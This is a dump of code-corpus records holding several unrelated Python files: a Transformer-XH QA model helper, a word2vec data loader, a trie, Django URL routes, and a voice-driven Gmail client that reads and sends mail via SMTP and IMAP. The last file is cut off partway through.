+{"seq_id":"370763836","text":"# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT license.\n\nfrom .model import Model, ModelHelper\nimport torch\nimport torch.nn as nn\n\n\nclass ModelHelper_Hotpot2(ModelHelper):\n def __init__(self, node_encoder, args, bert_config, config_model):\n super(ModelHelper_Hotpot2, self).__init__(node_encoder, args, bert_config, config_model)\n #self.mrc_final_layer = nn.Linear(self.config.hidden_size, 2)\n #self.mrc_final_layer.apply(self.init_weights)\n #self._init_weights(self.mrc_final_layer)\n \n \n def forward(self, batch, device): \n ### Transformer-XH for node representations\n g = batch[0]\n # g.ndata['encoding'] = g.ndata['encoding'].to(device)\n # g.ndata['encoding_mask'] = g.ndata['encoding_mask'].to(device)\n # g.ndata['segment_id'] = g.ndata['segment_id'].to(device)\n outputs = self.node_encoder(g, g.ndata['encoding'], g.ndata['segment_id'], g.ndata['encoding_mask'], gnn_layer=self.config_model['gnn_layer'])\n node_sequence_output = outputs[0]\n node_pooled_output = outputs[1]\n node_pooled_output = self.node_dropout(node_pooled_output)\n \n #### Task specific layer (last layer)\n #mrc_logits = self.mrc_final_layer(node_sequence_output)\n node_idx=[i for i in range(batch[0].ndata['label'].size(0)) if batch[0].ndata['label'][i].item()!=-1 and batch[0].ndata['label'][i].item()!=-2 ]\n his_idx=[i for i in range(batch[0].ndata['label'].size(0)) if batch[0].ndata['label'][i].item()==-2 ]\n # print(len(node_idx))\n # print(len(his_idx))\n\n can_features=node_pooled_output[node_idx]\n his_features=node_pooled_output[his_idx]\n #print(his_features.shape,can_features.shape)\n assert 2*len(his_idx)==len(node_idx)\n\n his_features=his_features.unsqueeze(1).transpose(1,2).repeat(1,1,2).transpose(1,2).reshape(-1,his_features.shape[-1])\n #print(his_features.shape,can_features.shape)\n features=torch.cat( (his_features,can_features ) ,1)\n\n # print('features: ',features)\n\n # print('dense: ',self.score2(features))\n\n res=self.final_layer1(features)\n logits=self.final_layer2(res)\n\n\n\n # logits = self.final_layer(node_pooled_output).squeeze(-1)\n\n return logits#, mrc_logits\n\n\n\n\nclass Model_Hotpot2(Model):\n def __init__(self, args, config):\n super(Model_Hotpot2, self).__init__(args, config)\n self.network= ModelHelper_Hotpot2(self.bert_node_encoder, self.args, self.bert_config, self.config_model)\n\n\n\n\n","sub_path":"transformer-xh/model/model_hotpotqa2.py","file_name":"model_hotpotqa2.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"511924248","text":"\"\"\"A preview of an output plot.\"\"\"\n\n\nfrom kivy.uix.image import Image\nfrom kivy.uix.screenmanager import Screen\nfrom kivy.lang import Builder\n\n\nBuilder.load_string('''\n#:kivy 1.0\n\n:\n canvas.before:\n Color:\n rgba: 1, 1, 1, .1\n BorderImage:\n size: self.size\n source: 'atlas://data/images/defaulttheme/button'\n''')\n\n\nclass PlotPreview(Screen):\n \"\"\"A preview of an output plot.\"\"\"\n\n def __init__(self, plot_path, **kwargs):\n \"\"\"Create and add the image widget, using plot_path as the source.\"\"\"\n super(PlotPreview, self).__init__(name=plot_path, **kwargs)\n image = Image(\n source=plot_path,\n pos_hint={'center_x': .5, 'center_y': .5},\n size_hint=(.9, .9),\n allow_stretch=True\n )\n self.add_widget(image)\n","sub_path":"plotygui/plotpreview.py","file_name":"plotpreview.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"138121455","text":"# Copyright (C) 2015 Jeffrey Meyers\n# This program is released under the \"MIT License\".\n# Please see the file COPYING in the source\n# distribution of this software for license terms.\n\n\n\"\"\" Scans\n\"\"\"\nID = 'id'\nDATE = 'date'\nLINE = 'line'\nDIR = 'dir'\nGEOM = 'geom'\nUSER_ID = 'user_id'\nSTOP = 'stop'\n\n\"\"\" Pairs - Scans\n\"\"\"\n#ID = 'id'\nON_ID = 'on_id'\nOFF_ID = 'off_id'\n\n\"\"\" Pairs - Stops\n\"\"\"\n#ID = 'id'\n#DATE = 'date'\n#LINE = 'line'\n#DIR = 'dir'\nON_STOP = 'on_stop'\nOFF_STOP = 'off_stop'\n#USER_ID = 'user_id'\n\n\"\"\" Surveys - Core\n\"\"\"\nURI = 'uri'\nUSER = 'user'\nMARK_COMPLETE = 'mark_complete'\nSUBMISSION_DATE = 'submission_date'\nDEVICEID = 'deviceid'\nSTART = 'start'\nEND = 'end'\nENGLISH = 'english'\nOTHER_LNG = 'other_lng'\nRTE = 'rte'\n#DIR = 'dir'\nORIG_PURPOSE = 'orig_purpose'\nORIG_PURPOSE_OTHER = 'orig_purpose_other'\nORIG_LAT = 'orig_lat'\nORIG_LNG = 'orig_lng'\nORIG_GEOM = 'orig_geom'\nORIG_ACCESS = 'orig_access'\nORIG_ACCESS_OTHER = 'orig_access_other'\nORIG_BLOCKS = 'orig_blocks'\nORIG_PARKING = 'orig_parking'\nDEST_PURPOSE = 'dest_purpose'\nDEST_PURPOSE_OTHER = 'dest_purpose_other'\nDEST_LAT = 'dest_lat'\nDEST_LNG = 'dest_lng'\nDEST_GEOM = 'dest_geom'\nDEST_ACCESS = 'dest_access'\nDEST_ACCESS_OTHER = 'dest_access_other'\nDEST_BLOCKS = 'dest_blocks'\nDEST_PARKING = 'dest_parking'\nBOARD_ID = 'board_id'\nALIGHT_ID = 'alight_id'\nBOARD_STOP = 'board_stop'\nALIGHT_STOP = 'alight_stop'\nTRANSFERS_BEFORE = 'transfers_before'\nTB_1 = 'tb_1'\nTB_2 = 'tb_2'\nTB_3 = 'tb_3'\nTRANSFERS_AFTER = 'transfers_after'\nTA_1 = 'ta_1'\nTA_2 = 'ta_2'\nTA_3 = 'ta_3'\nCHURN = 'churn'\nCHURN_OTHER = 'churn_other'\nREASON = 'reason'\nLICENSE = 'license'\nHOUSE_NO = 'house_no'\nWRK_OUT_HOUSE = 'wrk_out_house'\nWRK_VCHL = 'wrk_vchl'\nRACE = 'race'\nRACE_OTHER = 'race_other'\nINCOME = 'income'\nADDIT_LNG = 'addit_lng'\nOTHER_LNG_OTHER = 'other_lng_other'\nENGLISH_PROF = 'english_prof'\nVALID = 'valid'\n\n\"\"\" Survey - Lng\n\"\"\"\n#URI = 'uri'\nPARENT_URI = 'parent_uri'\nVALUE = 'value'\n\n","sub_path":"dashboard/mod_onoff/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"489113429","text":"# -*- coding: UTF-8 -*-\n#!/usr/bin/python3\n\"\"\"\n@Author Yi Zhu\nUpdated 01/18/2019\nThe code is borrowed from \nhttps://github.com/Adoni/word2vec_pytorch/\nhttps://github.com/ray1007/pytorch-word2vec/\n\"\"\"\n\n#************************************************************\n# Imported Libraries\n#************************************************************\nfrom collections import defaultdict\nimport os\nimport sys\nimport numpy as np\n\nsys.path.append('../')\nfrom word.wordbase_input_data import WordBaseInputData \n\nimport pdb\n\n\nclass WordInputData(WordBaseInputData):\n def __init__(self, args):\n \"\"\"\n vocab_file: file containing word freq pairs\n \"\"\"\n super(WordInputData, self).__init__(args)\n # training corpus\n self.infile = args.train\n # (word freq) dict\n self.vocab_file = self.infile + '.dict'\n # minimun count and the corresponding word list\n self.min_count = args.min_count\n self.min_count_word_file = self.infile + '.{}.word'.format(self.min_count)\n # generate word -> freq vocab_file \n if not os.path.exists(self.vocab_file) or not os.path.exists(self.min_count_word_file):\n print('Did not found vocabulary file, generating vocabulary file...')\n self.gen_vocab()\n \n # multiprocessing\n # split the file into n parts, n = thread_number\n self.start_pos = []\n self.end_pos = []\n self.get_pos(args.thread)\n\n self.idx2ct = None\n self.idx2freq = None\n self.read_vocab()\n self.vocab_size = len(self.word2idx)\n self.word_ct = self.idx2ct.sum()\n \n # create negative sampling distribution\n self.neg_sample_probs = None\n self.init_sample_table()\n \n print('Vocabulary size: {}'.format(self.vocab_size))\n print(\"Words in train file: {}\".format(self.word_ct)) \n\n\n def get_pos(self, thread_n):\n file_size = os.path.getsize(self.infile) #size of file (in bytes)\n #break the file into n chunks for processing.\n file_step = file_size // thread_n if file_size % thread_n == 0 else file_size // thread_n + 1\n initial_chunks = range(1, file_size, file_step)\n with open(self.infile, 'r') as fin:\n self.start_pos = sorted(set([self.newlinebefore(fin, i) for i in initial_chunks]))\n assert(len(self.start_pos) == thread_n)\n self.end_pos = [i - 1 for i in self.start_pos] [1:] + [None]\n\n\n def newlinebefore(self, f, n):\n f.seek(n)\n try:\n c = f.read(1)\n except UnicodeDecodeError:\n c = ''\n while c != '\\n' and n > 0:\n n -= 1\n f.seek(n)\n try:\n c = f.read(1)\n except UnicodeDecodeError:\n continue\n return n\n\n\n def gen_vocab(self):\n \"\"\"\n generate vocab: freq dictionary to vocab_file\n \"\"\"\n word2ct = defaultdict(int)\n line_n = len(open(self.infile, 'r').readlines())\n with open(self.infile, 'r') as fin:\n for i in range(line_n):\n sys.stdout.write('{}/{}\\r'.format(i + 1, line_n))\n sys.stdout.flush()\n line = fin.readline()\n linevec = line.strip().split()\n for w in linevec:\n word2ct[w] += 1\n with open(self.vocab_file, 'w') as fout, open(self.min_count_word_file, 'w') as foutw:\n # sort the pair in descending order\n for w, c in sorted(word2ct.items(), key = lambda x: x[1], reverse = True):\n fout.write('{}\\t{}\\n'.format(w, c))\n if c >= self.min_count:\n foutw.write('{}\\n'.format(w)) \n\n\n def read_vocab(self):\n \"\"\"\n get word: freq from vocab_file\n \"\"\"\n word2freq = defaultdict(int)\n line_n = len(open(self.vocab_file, 'r').readlines())\n with open(self.vocab_file, 'r') as fin:\n for line in fin:\n linevec = line.strip().split()\n assert(len(linevec) == 2)\n word2freq[linevec[0].strip()] = int(linevec[1])\n idx = 0\n self.idx2ct = {}\n for w, c in word2freq.items():\n if c < self.min_count:\n # word2freq is already sorted according to count\n break\n self.word2idx[w] = idx \n self.idx2word[idx] = w\n self.idx2ct[idx] = c\n idx += 1\n self.idx2ct = np.array(list(self.idx2ct.values()))\n self.idx2freq = self.idx2ct / self.idx2ct.sum() \n\n\n def init_sample_table(self):\n # according to idx order\n pow_ct = np.array(list(self.idx2ct)) ** 0.75\n words_pow = sum(pow_ct)\n self.neg_sample_probs = pow_ct / words_pow\n\n\n def get_batch_pairs(self, linevec_idx, win_size):\n pairs = []\n for i, w in enumerate(linevec_idx):\n # dynamic window size [1, win_size]\n actual_win_size = np.random.randint(win_size) + 1\n # get context according to window size\n context = linevec_idx[max(0, i - actual_win_size): i] + linevec_idx[i + 1: i + 1 + actual_win_size]\n for c in context:\n pairs.append((w, c))\n return pairs\n","sub_path":"code/word/word_input_data.py","file_name":"word_input_data.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"565963895","text":"\"\"\"\n1. 校验数据集的合法性\n2. 将数据集修改成一列一列的形式\n3. 将一些一维的数据转化成二维的形式\n\"\"\"\nimport numpy as np\n\n\ndef valid_dataset(data, axis=0):\n if ('train' in data) & ('test' in data):\n train = data['train']\n test = data['test']\n [train_flag, train] = valid_data(train, axis)\n if train_flag is False:\n return False, data\n [test_flag, test] = valid_data(test, axis)\n if test_flag is False:\n return False, data\n data['train'] = train\n data['test'] = test\n return True, data\n else:\n return False, data\n\n\ndef valid_data(data, axis=0):\n if ('X' in data) & ('Y' in data):\n x = data['X']\n y = data['Y']\n if axis == 1:\n x = data['X'].T\n y = data['Y'].T\n if x.ndim == 1:\n x = x.reshape(1, x.size)\n if y.ndim == 1:\n y = y.reshape(1, y.size)\n if x.ndim != 2 | y.ndim != 2:\n return False, data\n if x.shape[1] == y.shape[1]:\n data['X'] = x\n data['Y'] = y\n return True, data\n else:\n return False, data\n","sub_path":"utils/validDataset.py","file_name":"validDataset.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"350737785","text":"# coding=utf-8\n\nclass StrTrie:\n def __init__(self):\n self.leaf = {}\n self.value = None\n\n\ndef insert(root, key, value=None):\n if key is None:\n return None\n\n if root is None:\n root = StrTrie()\n\n t = root\n for c in key:\n if c not in t.leaf:\n t.leaf[c] = StrTrie()\n t = t.leaf[c]\n\n t.value = value\n return root\n\n\ndef search(root, key):\n if key is None:\n return None\n\n t = root\n for c in key:\n if c not in t.leaf:\n return None\n t = t.leaf[c]\n\n return t.value\n\n\ndef form_map(m, insert_func):\n root = None\n for k, v in m.items():\n root = insert_func(root, k, v)\n\n return root\n\n\ndef map_to_trie(m):\n form_map(m, insert)\n","sub_path":"hota/basic/algorithm/struct/trie/str_trie.py","file_name":"str_trie.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"599511180","text":"\"\"\"chawkesdj URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\n#from django.urls import path\nfrom django.contrib import admin\nfrom chawkesdj import views as cdj_views\n\nurlpatterns = [\n url(r'^$', cdj_views.index),\n url(r'^events/', include('events.urls')),\n url(r'^shareShack/', include('shareShack.urls')),\n url(r'^foodCosts/', include('foodCosts.urls')),\n url(r'^layout/$', cdj_views.layout),\n url(r'^about/$', cdj_views.about),\n url(r'^admin/', admin.site.urls),\n url(r'^accounts/', include('accounts.urls', namespace=\"accounts\")),\n]\n","sub_path":"chawkesdj/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"42028640","text":"import speech_recognition as sr\r\nimport smtplib\r\nfrom bs4 import BeautifulSoup\r\nimport email\r\nimport imaplib\r\nfrom gtts import gTTS\r\nimport pyglet\r\nimport os, time\r\nfrom email.header import decode_header\r\nimport webbrowser\r\n#pyglet.lib.load_library('avbin')\r\n#pyglet.have_avbin=True\r\n\r\n#function to give reply as 'ok done' to user\r\ndef ok_done():\r\n tts = gTTS(text=\"Ok Done!\", lang='en')\r\n ttsname=(\"okdone.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print (\"ok done!! \\n\")\r\n\r\n#function for error when audio could not be recognised\r\ndef error1():\r\n tts = gTTS(text=\"Google Speech Recognition could not understand audio.\", lang='en')\r\n ttsname=(\"error1.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"Google Speech Recognition could not understand audio. \\n\")\r\n choices()\r\n\r\n#function for google speech recognition service error\r\ndef error2():\r\n tts = gTTS(text=\"Could not request results from Google Speech Recognition service\", lang='en')\r\n ttsname=(\"error2.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"Could not request results from Google Speech Recognition service \\n\")\r\n choices()\r\n\r\n#function for going back to choices menu or exiting the program\r\ndef backtomenu():\r\n tts = gTTS(text=\"Do you want to go back to choices menu for performing other actions or Do you want to Exit? Reply with Yes Or Exit Only.\", lang='en')\r\n ttsname=(\"backtomenu.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"Do you want to go back to choices menu for performing other actions or Do you want to Exit?\")\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n audio=r.listen(source)\r\n text=r.recognize_google(audio)\r\n print(\"you said : \" + text + \"\\n\")\r\n if text == \"yes\" or text == \"Yes\":\r\n choices() \r\n else:\r\n exit()\r\n\r\n#function to take mail subject as input\r\ndef input_subject():\r\n tts = gTTS(text=\"Please Provide Subject For your Mail\", lang='en')\r\n ttsname=(\"sub_mail.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Please Provide Subject For your Mail.\")\r\n audio=r.listen(source)\r\n input_subject.subject = r.recognize_google(audio)\r\n print(input_subject.subject +\"\\n\")\r\n ok_done()\r\n\r\n tts = gTTS(text=input_subject.subject, lang='en')\r\n ttsname=(\"sub_repeat.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"your subject is : \" + input_subject.subject +\"\\n\")\r\n validating_sub_input() \r\n\r\n#function to take mail body as input\r\ndef input_body():\r\n tts = gTTS(text=\"Please Provide Body Context For your Mail.\", lang='en')\r\n ttsname=(\"body_mail.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Please Provide Body For your Mail.\")\r\n audio=r.listen(source)\r\n input_body.body = r.recognize_google(audio)\r\n print(input_body.body +\"\\n\")\r\n ok_done()\r\n\r\n tts = gTTS(text=input_body.body, lang='en')\r\n ttsname=(\"body.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"your body is : \" + input_body.body +\"\\n\")\r\n validating_body_input()\r\n\r\n#function to validate subject\r\ndef validating_sub_input():\r\n tts = gTTS(text=\"Is the provided input correct? Reply with yes or no only.\", lang='en')\r\n ttsname=(\"val_input.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n \r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Is the provided input correct?\")\r\n audio=r.listen(source)\r\n text = r.recognize_google(audio)\r\n print(\"you said: \"+ text + \"\\n\")\r\n ok_done()\r\n if text == \"yes\" or text == \"YES\":\r\n input_body()\r\n else:\r\n input_subject() \r\n\r\n#function to validate body\r\ndef validating_body_input():\r\n tts = gTTS(text=\"Is the provided input correct? Reply with yes or no only.\", lang='en')\r\n ttsname=(\"val_input.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n \r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Is the provided input correct?\")\r\n audio=r.listen(source)\r\n text = r.recognize_google(audio)\r\n print(\"you said: \"+ text + \"\\n\")\r\n ok_done()\r\n if text == \"yes\" or text == \"YES\":\r\n mail_send()\r\n else:\r\n input_body() \r\n\r\n#function to send mail\r\ndef mail_send():\r\n gmail_user = main.fullemail\r\n gmail_password = main.password\r\n\r\n sent_from = gmail_user\r\n to = [choices.remail]\r\n subject = input_subject.subject\r\n body = input_body.body\r\n\r\n email_text = f'Subject: {subject}\\n\\n{body}'\r\n\r\n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\r\n server.ehlo()\r\n server.login(main.fullemail, main.password)\r\n server.sendmail(sent_from, to, email_text)\r\n server.close()\r\n \r\n tts = gTTS(text=\"Congrats! Your mail has been send. \", lang='en')\r\n ttsname=(\"mailsend.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n print (\"Congrats! Your mail has send. \\n\")\r\n \r\n backtomenu()\r\n\r\n#function to call the title\r\ndef main_project():\r\n tts = gTTS(text=\"Welcome to the Voice based Email Application\", lang='en')\r\n ttsname=(\"title.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"Welcome to the Voice based Email Application \\n\")\r\n main()\r\n\r\n#main function of program\r\ndef main():\r\n tts = gTTS(text=\"Please Provide your Gmail I D without @gmail.com\", lang='en')\r\n ttsname=(\"I_mail.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Please Provide your Gmail ID without @gmail.com.\")\r\n eaudio=r.listen(source)\r\n email_ID = r.recognize_google(eaudio)\r\n ok_done()\r\n emailcorrected = email_ID.replace(\" \",\"\")\r\n emaildomain = \"@gmail.com\"\r\n main.fullemail = emailcorrected + emaildomain\r\n print(\"your mail id is : \" + main.fullemail + \"\\n\")\r\n \r\n tts = gTTS(text=\"Please Provide your Gmail I D Password\", lang='en')\r\n ttsname=(\"P_mail.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Please Provide your Gmail ID Password.\")\r\n P_audio=r.listen(source)\r\n input_password = r.recognize_google(P_audio)\r\n main.password = input_password.replace(\" \",\"\")\r\n print(\"your password is : ********** \\n\")\r\n ok_done()\r\n \r\n mail = smtplib.SMTP('smtp.gmail.com',587)\r\n mail.ehlo()\r\n mail.starttls()\r\n try:\r\n mail.login(main.fullemail,main.password)\r\n tts = gTTS(text=\"You have Succesfully Logged In to your email account!\", lang='en')\r\n ttsname=(\"success.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"Succesfully Logged In! \\n\")\r\n choices()\r\n\r\n except smtplib.SMTPAuthenticationError:\r\n tts = gTTS(text=\"Your Mail I d And Password does not match. Please Provide Your Credentials again\", lang='en')\r\n ttsname=(\"auth_error.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"Id And Password does not match \\n\")\r\n main()\r\n \r\ndef choices():\r\n print (\"Select What You Want to do\")\r\n tts = gTTS(text=\"Select your choice\", lang='en')\r\n ttsname=(\"choice_title.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n print (\"1. Compose a mail.\")\r\n tts = gTTS(text=\"Say First if you want to Compose A Mail.\", lang='en')\r\n ttsname=(\"choice1.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n print (\"2. Check your inbox \\n\")\r\n tts = gTTS(text=\"Say Second if you want to Check Your Inbox\", lang='en')\r\n ttsname=(\"choice2.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n tts = gTTS(text=\"Your choice\", lang='en')\r\n ttsname=(\"yourchoice.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print (\"Your choice: \\n\")\r\n audio=r.listen(source)\r\n text=r.recognize_google(audio)\r\n\r\n print (\"You said : \"+text + \"\\n\")\r\n ok_done()\r\n#-----------------------------------------------------------------------------------------------\r\n if text == 'first' or text == 'fast' or text == 'First':\r\n tts = gTTS(text=\"Please Provide recipient's Gmail I D without @gmail.com\", lang='en')\r\n ttsname=(\"R_mail.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print (\"ok done!!\")\r\n\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Please Provide recipient's Gmail ID without @gmail.com.\")\r\n raudio=r.listen(source)\r\n rmail_ID = r.recognize_google(raudio)\r\n ok_done()\r\n rmailcorrected = rmail_ID.replace(\" \",\"\")\r\n rmaildomain = \"@gmail.com\"\r\n choices.remail = rmailcorrected + rmaildomain\r\n print(choices.remail + \"\\n\")\r\n input_subject() \r\n#-----------------------------------------------------------------------------------------------\r\n if text == 'Second' or text == 'second' :\r\n mail = imaplib.IMAP4_SSL('imap.gmail.com',993)\r\n mail.login(main.fullemail,main.password)\r\n stat, total = mail.select('Inbox')\r\n totalstr = str(total)\r\n corrected_total = totalstr.replace('b','')\r\n print (\"Number of mails in your inbox :\"+ corrected_total)\r\n tts = gTTS(text=\"Total mails are :\"+corrected_total, lang='en')\r\n ttsname=(\"total.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n #unseen mails\r\n mail.select()\r\n unseen = len(mail.search(None, 'UnSeen')[1][0].split()) # unseen count\r\n print (\"Number of UnSeen mails :\" + str(unseen))\r\n tts = gTTS(text=\"Your Unseen mail :\"+str(unseen), lang='en')\r\n ttsname=(\"unseen.mp3\") \r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n\r\n # account credentials\r\n username = main.fullemail\r\n password = main.password\r\n\r\n def clean(text):\r\n # clean text for creating a folder\r\n return \"\".join(c if c.isalnum() else \"_\" for c in text)\r\n\r\n # create an IMAP4 class with SSL \r\n imap = imaplib.IMAP4_SSL(\"imap.gmail.com\")\r\n # authenticate\r\n imap.login(username, password)\r\n\r\n tts = gTTS(text=\"Do u want to see the unseen mails\", lang='en')\r\n ttsname=(\"unseenmails.mp3\") \r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Do u want to see the unseen mail?\")\r\n audio=r.listen(source)\r\n text = r.recognize_google(audio)\r\n ok_done()\r\n print(\"you said : \" + text + \"\\n\")\r\n if text == 'yes' or text == 'Yes':\r\n N=unseen\r\n else:\r\n exit() \r\n\r\n status, messages = imap.select(\"INBOX\")\r\n # number of top emails to fetch\r\n # total number of emails\r\n messages = int(messages[0])\r\n for i in range(messages, messages-N, -1):\r\n # fetch the email message by ID\r\n res, msg = imap.fetch(str(i), \"(RFC822)\")\r\n for response in msg:\r\n if isinstance(response, tuple):\r\n # parse a bytes email into a message object\r\n msg = email.message_from_bytes(response[1])\r\n # decode the email subject\r\n subject, encoding = decode_header(msg[\"Subject\"])[0]\r\n if isinstance(subject, bytes):\r\n # if it's a bytes, decode to str\r\n subject = subject.decode(encoding)\r\n # decode email sender\r\n From, encoding = decode_header(msg.get(\"From\"))[0]\r\n if isinstance(From, bytes):\r\n From = From.decode(encoding)\r\n print(\"Subject:\", subject)\r\n tts = gTTS(text=\"Subject of Recieved mail is \" + subject, lang='en')\r\n ttsname=(\"subv.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n print(\"From:\", From)\r\n tts = gTTS(text=\"Mail is from\" + From, lang='en')\r\n ttsname=(\"fromv.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n # if the email message is multipart\r\n if msg.is_multipart():\r\n # iterate over email parts\r\n for part in msg.walk():\r\n # extract content type of email\r\n content_type = part.get_content_type()\r\n content_disposition = str(part.get(\"Content-Disposition\"))\r\n try:\r\n # get the email body\r\n body = part.get_payload(decode=True).decode()\r\n except:\r\n pass\r\n if content_type == \"text/plain\" and \"attachment\" not in content_disposition:\r\n # print text/plain emails and skip attachments\r\n print(body)\r\n if(len(body) == 0):\r\n pass\r\n else:\r\n tts = gTTS(text=body, lang='en')\r\n ttsname=(\"printbody.mp3\")\r\n tts.save(ttsname)\r\n music = pyglet.media.load(ttsname, streaming = False)\r\n music.play()\r\n time.sleep(music.duration)\r\n os.remove(ttsname)\r\n elif \"attachment\" in content_disposition:\r\n # download attachment\r\n filename = part.get_filename()\r\n if filename:\r\n folder_name = clean(subject)\r\n if not os.path.isdir(folder_name):\r\n # make a folder for this email (named after the subject)\r\n os.mkdir(folder_name)\r\n filepath = os.path.join(folder_name, filename)\r\n # download attachment and save it\r\n open(filepath, \"wb\").write(part.get_payload(decode=True))\r\n else:\r\n # extract content type of email\r\n content_type = msg.get_content_type()\r\n # get the email body\r\n body = msg.get_payload(decode=True).decode()\r\n if content_type == \"text/plain\":\r\n # 